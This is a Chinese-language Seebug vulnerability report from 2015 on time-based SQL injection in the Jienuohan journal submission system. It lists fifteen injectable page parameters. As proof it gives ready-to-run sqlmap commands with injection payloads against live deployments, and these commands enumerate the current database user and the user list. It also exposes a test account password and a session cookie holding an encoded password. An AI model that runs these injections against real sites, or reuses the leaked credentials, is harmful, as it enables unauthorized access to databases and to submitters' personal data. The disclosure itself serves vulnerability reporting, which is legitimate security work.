南京杰诺瀚期刊投稿系统15处SQL注入打包提交

2015-07-08T00:00:00
ID SSV:95746
Type seebug
Reporter Root
Modified 2015-07-08T00:00:00

Description

简要描述:

需要注册一个账号,但是不鸡肋,因为所有涉及的案例都可以注册

详细说明:

南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据... 官网:http://.../

<img src="https://images.seebug.org/upload/201507/0512065039d7f0f06935f156e45cff6d5d2b018b.png" alt="QQ图片20150705120505.png" width="600" onerror="javascript:errimg(this);">

注入点: Tougao/WangYinList.aspx?searchid=0&page=1 Tougao/DingDanList.aspx?searchid=0&page=1 Tougao/AuthorGaoJianList.aspx?searchid=0&page=1 Tougao/WorkList.aspx?searchid=0&page=1 Tougao/msgList.aspx?searchid=59214 Tougao/ViewMsg.aspx?ItemNo=784&state=Send Tougao/TipsIcon.aspx?State=&IconName=MsgView Tougao/DingDanView.aspx?Add=1 Tougao/SelectAuthor.aspx?sGaoHao=2009003052 Tougao/DownloadList.aspx?sGaoHao=2009003052 Tougao/DownFile.aspx?FileId=5535 Tougao/WriteMsg.aspx?gid=2009003052 Tougao/CreateTouGao.aspx?sGaoHao=2009003052 Tougao/ViewGaoJian.aspx?sGaoHao=2009003052 Tougao/AuthorManager.aspx?owner=1071 案例: http://.../Web/Login.aspx http://.../Web/CommonPage.aspx?Id=14 http://.../Web/CommonPage.aspx?Id=14 http://.../Web/CommonPage.aspx?Id=6 http://... http://.../Web/Qikan.aspx http://.../CommonPage.aspx?Id=6 http://.../web/CommonPage.aspx?Id=36 http://.../Web/CommonPage.aspx?Id=1 http://.../Web/CommonPage.aspx?Id=1 http://.../Web/Qikan.aspx

漏洞证明:

由于注入点较多 我就只演示2个站的注入啦 http://.../Tougao/DingDanView.aspx?Add=1 账号密码都是aizai2010 如果是第一次注入需要cookie,我已经注入过了所以不用cookie http://.../Tougao/DingDanView.aspx?Add=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --current-user -v 3 --batch

<img src="https://images.seebug.org/upload/201507/05121409ef3fa5d2332bc2404df96e46c6487620.jpg" alt="QQ图片20150705121217.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201507/0512141875de12c2e9d00bfd6b45bb59990e5a20.jpg" alt="QQ图片20150705121232.jpg" width="600" onerror="javascript:errimg(this);">

http://.../Tougao/AuthorGaoJianList.aspx?searchid=0&page=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

<img src="https://images.seebug.org/upload/201507/05123755aa56ec905ac018a075241dbf95a489e2.jpg" alt="QQ图片20150705123613.jpg" width="600" onerror="javascript:errimg(this);">

http://.../Tougao/AuthorManager.aspx?owner=6798 账号密码都是aizai2010 如果是第一次注入需要cookie sqlmap.py -u "http://.../Tougao/AuthorManager.aspx?owner=6798%27,1,1,1,1,1,1,1,1,1,1,1,1" --dbms mssql --level 1 --risk 3 --technique=T --current-user -v 3 --batch --cookie " _ga=GA1.2.207810116.1435997856; reurl=http://...*/Tougao/Main.htm; dnt=userid=6798&password=a198XrE3XTilfJeae4337Ap2zI0kj%2fM4nmXkgDLzyRTY1CZwRNipAg%3d%3d&tpp=0&ppp=0&pmsound=&invisible=1&referer=index.aspx&sigstatus=0&expires=-1; lastolupdate=1475965671"

<img src="https://images.seebug.org/upload/201507/05121630a8508076a19c662d7cebcf9ac67e11bb.jpg" alt="QQ图片20150705121430.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201507/05121639e338c55b145e289f31eb095950126fa7.jpg" alt="QQ图片20150705121445.jpg" width="600" onerror="javascript:errimg(this);">

其他的注入点也都可以复现不信自己试试